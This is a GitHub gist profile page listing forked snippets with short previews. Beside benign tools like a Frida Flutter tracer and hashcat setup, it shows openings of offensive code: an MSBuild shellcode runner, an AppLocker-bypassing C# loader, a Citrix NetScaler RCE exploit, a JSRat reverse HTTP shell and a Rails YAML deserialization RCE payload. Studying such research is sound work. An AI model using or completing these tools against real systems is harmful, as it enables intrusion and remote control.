Skip to content

Instantly share code, notes, and snippets.

View pich4ya's full-sized avatar

LongCat pich4ya

View GitHub Profile
@pich4ya
pich4ya / flutter_ios.js
Created June 18, 2021 06:28 — forked from AICDEV/flutter_ios.js
Frida trace Flutter Functions on iOS
/**
* run the script to a running app: frida -U "appName" -l flutter_ios.js --no-pause
* start app direct with the script: frida -Uf bundleIdentifier -l flutter_ios.js --no-pause
*/
// #############################################
// HELPER SECTION START
var colors = {
"resetColor": "\x1b[0m",
"green": "\x1b[32m",
"yellow": "\x1b[33m",
@pich4ya
pich4ya / fix_virtualenv
Created May 16, 2020 18:45 — forked from tevino/fix_virtualenv
Fix python virtualenv after python update
#!/usr/bin/env bash
ENV_PATH="$(dirname "$(dirname "$(which pip)")")"
SYSTEM_VIRTUALENV="$(which -a virtualenv|tail -1)"
BAD_ENV_PATHS="/usr/local"
echo "Ensure the root of the broken virtualenv:"
echo " $ENV_PATH"
@pich4ya
pich4ya / shellcode.xml
Created May 1, 2020 23:57 — forked from ConsciousHacker/shellcode.xml
MSBuild Shellcode Runner
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
@pich4ya
pich4ya / Shellcode.cs
Created May 1, 2020 23:54 — forked from netbiosX/Shellcode.cs
C# file that contains shellcode and bypasses AppLocker via Assembly Load
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
 
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@pich4ya
pich4ya / netscaler_exploit.py
Created January 19, 2020 14:56 — forked from 0x09AL/netscaler_exploit.py
Citrix ADC / NetScaler Remote Command Execution
import requests
import sys
import time
append_value = str(time.time())
print "# By 0x09AL - MDSec ActiveBreach \n"
def upload_file(url,payload):
endpoint = url + "/vpns/portal/scripts/newbm.pl"
@pich4ya
pich4ya / ChangePassword.java
Created February 24, 2019 07:47 — forked from zach-klippenstein/ChangePassword.java
The keystore password on Java keystore files is utterly pointless. You can reset it without knowing it, as shown by this code. Note that private keys are still secure, as far as I know. The JKS implementation is copyright Casey Marshall (rsdio@metastatic.org), and the original source is available at http://metastatic.org/source/JKS.java. I've in…
import java.util.*;
import java.io.*;
import java.security.*;
public class ChangePassword
{
private final static JKS j = new JKS();
public static void main(String[] args) throws Exception
{
@pich4ya
pich4ya / hashcat_macos.sh
Last active February 4, 2022 00:34 — forked from chadmayfield/hashcat_macos.sh
Install Hashcat on macOS
#!/bin/bash
git clone https://github.com/hashcat/hashcat.git
mkdir -p hashcat/deps
git clone https://github.com/KhronosGroup/OpenCL-Headers.git hashcat/deps/OpenCL
cd hashcat/ && make && make install
./hashcat --version
./hashcat -b -D 1,2
./example0.sh
@pich4ya
pich4ya / JSRat.ps1
Created July 4, 2018 18:01 — forked from nbosa/JSRat.ps1
Fileless JavaScript Reverse HTTP Shell
<#
Author: Casey Smith @subTee
License: BSD3-Clause
.SYNOPSIS
Simple Reverse Shell over HTTP. Execute Commands on Client.
@pich4ya
pich4ya / railspwn.rb
Last active November 29, 2018 06:25 — forked from niklasb/railspwn.rb
Rails 5.1.4 YAML unsafe deserialization RCE payload, full credit to: https://gist.github.com/500646/5a0add1a0301492714342ba82b1d3aee
# https://gist.github.com/500646/5a0add1a0301492714342ba82b1d3aee
require 'yaml'
require 'base64'
require 'erb'
class ActiveSupport
class Deprecation
def initialize()
@silenced = true
end